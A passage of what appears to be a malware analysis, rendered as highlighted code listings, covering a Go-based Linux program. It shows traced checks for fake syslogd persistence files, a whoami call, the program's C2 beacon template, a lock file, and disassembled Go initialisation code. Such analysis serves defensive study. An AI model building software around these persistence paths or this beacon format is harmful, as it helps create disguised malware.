<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/rc.d/syslogger&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/init/syslogd.conf&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/systemd/system/syslogd.service&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/init.d/syslogd&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> check user</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;whoami&quot;</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> used <span class="kw1">for</span> sending data to c2 with hardcoded template<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">generation<span class="sy0">=%</span>d&amp;guid<span class="sy0">=%</span>s&amp;platform<span class="sy0">=%</span>s&amp;version<span class="sy0">=%</span>d&amp;whoami<span class="sy0">=%</span>s<span class="sy0">%</span>0A </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> lock runfile </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="st0">&quot;/tmp/.applock&quot;</span></div></li>
<li class="li1"><div class="de1">code<span class="sy0">:</span> getsockname<span class="br0">&#40;</span><span class="nu0">3</span><span class="sy0">,</span> <span class="br0">&#123;</span>sa_family<span class="sy0">=</span>AF_FILE<span class="sy0">,</span> path<span class="sy0">=</span><span class="st0">&quot;/tmp/.applock&quot;</span><span class="br0">&#125;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="nu0">16</span><span class="br0">&#93;</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> Code execution environment <span class="br0">&#40;</span>is initiated<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32676</span> <span class="nu0">16</span> <span class="nu0">15</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>Command</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32686</span> <span class="nu0">23</span> <span class="nu0">22</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>interfaceEqual</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3269d</span> <span class="nu0">20</span> <span class="nu0">19</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>envv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x326b1</span> <span class="nu0">21</span> <span class="nu0">20</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stdin</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x326c6</span> <span class="nu0">22</span> <span class="nu0">21</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stdout</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x326dc</span> <span class="nu0">22</span> <span class="nu0">21</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stderr</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x326f2</span> <span class="nu0">32</span> <span class="nu0">31</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>writerDescriptor</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32712</span> <span class="nu0">32</span> <span class="nu0">31</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>closeDescriptors</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32732</span> <span class="nu0">21</span> <span class="nu0">20</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Start</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32747</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>ExitError<span class="br0">&#41;</span><span class="sy0">.</span>Error</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32762</span> <span class="nu0">20</span> <span class="nu0">19</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Wait</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32776</span> <span class="nu0">26</span> <span class="nu0">25</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>StdoutPipe</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32790</span> <span class="nu0">26</span> <span class="nu0">25</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>StderrPipe</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327aa</span> <span class="nu0">15</span> <span class="nu0">14</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>init<span class="sy0">.</span>1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327b9</span> <span class="nu0">23</span> <span class="nu0">22</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>findExecutable</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327d0</span> <span class="nu0">17</span> <span class="nu0">16</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>LookPath</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327e1</span> <span class="nu0">29</span> <span class="nu0">28</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>interfaceEqual<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x327fe</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stdin<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32819</span> <span class="nu0">38</span> <span class="nu0">37</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>writerDescriptor<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3283f</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Start<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3285a</span> <span class="nu0">27</span> <span class="nu0">26</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>Start<span class="sy0">.</span>func2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32875</span> <span class="nu0">21</span> <span class="nu0">20</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>init<span class="sy0">.</span>1<span class="sy0">.</span>func1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3288a</span> <span class="nu0">13</span> <span class="nu0">12</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>init <span class="sy0">&lt;====</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">void sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init<span class="br0">&#40;</span>undefined8 param_1<span class="sy0">,</span> undefined8 param_2<span class="sy0">,</span> int64_t param_3<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; uint64_t <span class="sy0">*</span>puVar1<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; int64_t in_FS_OFFSET<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 uStack24<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; undefined8 uStack16<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">while</span> <span class="br0">&#40;</span>puVar1 <span class="sy0">=</span> <span class="br0">&#40;</span>uint64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span><span class="sy0">*</span><span class="br0">&#40;</span>int64_t <span class="sy0">*</span><span class="br0">&#41;</span><span class="br0">&#40;</span>in_FS_OFFSET <span class="sy0">+</span> <span class="nu0">0xfffffff8</span><span class="br0">&#41;</span> <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#41;</span><span class="sy0">,</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1 || <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span><span class="br0">&#40;</span>BADSPACEBASE <span class="sy0">**</span><span class="br0">&#41;</span><span class="nu0">0x20</span> <span class="sy0">==</span> <span class="br0">&#40;</span>undefined <span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">*</span>puVar1<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>morestack_noctxt<span class="br0">&#40;</span>param_1<span class="sy0">,</span> param_2<span class="sy0">,</span> param_3<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; param_3 <span class="sy0">=</span> extraout_RDX<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span><span class="nu0">1</span> <span class="sy0">&lt;</span> <span class="br0">&#40;</span>uint8_t<span class="br0">&#41;</span>obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span>obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">==</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>throwinit<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">do</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; invalidInstructionException<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">while</span><span class="br0">&#40;</span> <span class="kw4">true</span> <span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x1</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>bytes<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>context<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">io</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span><span class="kw3">os</span><span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>strings<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>sync<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>errors<span class="sy0">.</span>New<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; _obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>ErrNotFound <span class="sy0">=</span> uStack24<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#40;</span>_obj<span class="sy0">.</span>runtime<span class="sy0">.</span>writeBarrier <span class="sy0">==</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">*</span><span class="br0">&#40;</span>undefined8 <span class="sy0">*</span><span class="br0">&#41;</span><span class="nu0">0x826548</span> <span class="sy0">=</span> uStack16<span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">else</span> <span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; sym<span class="sy0">.</span>runtime<span class="sy0">.</span>writebarrierptr<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init<span class="sy0">.</span>1<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; obj<span class="sy0">.</span>os_exec<span class="sy0">.</span>initdone<span class="sy0">.</span> <span class="sy0">=</span> <span class="br0">&#40;</span>code<span class="br0">&#41;</span><span class="nu0">0x2</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; <span class="kw1">return</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> CALL XREF from sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init @ <span class="nu0">0x64623b</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.os_exec.init:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span> <span class="nu0">234</span><span class="sy0">:</span> sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init <span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">| bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| sp<span class="sy0">:</span> <span class="nu0">4</span> <span class="br0">&#40;</span>vars <span class="nu0">4</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00623e10</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00623e19</span> &nbsp; &nbsp; &nbsp;cmp rsp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x00623e1d</span> &nbsp; &nbsp; &nbsp;jbe <span class="nu0">0x623ef0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x00623e23</span> &nbsp; &nbsp; &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">0x28</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> <span class="co1">---------------------------</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064623b</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>os_exec<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646240</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>path_filepath<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646245</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>regexp<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064624a</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">4</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064624f</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>strconv<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">5</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646254</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>strings<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">6</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646259</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>syscall<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">7</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064625e</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00646263</span> &nbsp; &nbsp; &nbsp;mov byte <span class="br0">&#91;</span>obj<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>initdone<span class="sy0">.</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">2</span> &nbsp; &nbsp;<span class="sy0">;</span> <span class="br0">&#91;</span><span class="nu0">0x843345</span><span class="sy0">:</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064626a</span> &nbsp; &nbsp; &nbsp;mov rbp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x0064626e</span> &nbsp; &nbsp; &nbsp;add rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> CALL XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>init @ <span class="nu0">0x648a74</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.app_vendor_worker.init:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span> <span class="nu0">173</span><span class="sy0">:</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init <span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">| bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| sp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x006461d0</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x006461d9</span> &nbsp; &nbsp; &nbsp;cmp rsp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x006461dd</span> &nbsp; &nbsp; &nbsp;jbe <span class="nu0">0x646273</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x006461e3</span> &nbsp; &nbsp; &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">8</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> <span class="co1">---------------------------</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a74</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>init &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">:</span> &nbsp; <span class="nu0">0x00648a79</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_github<span class="sy0">.</span>com_satori_go_2euuid<span class="sy0">.</span>init <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span></div></li>
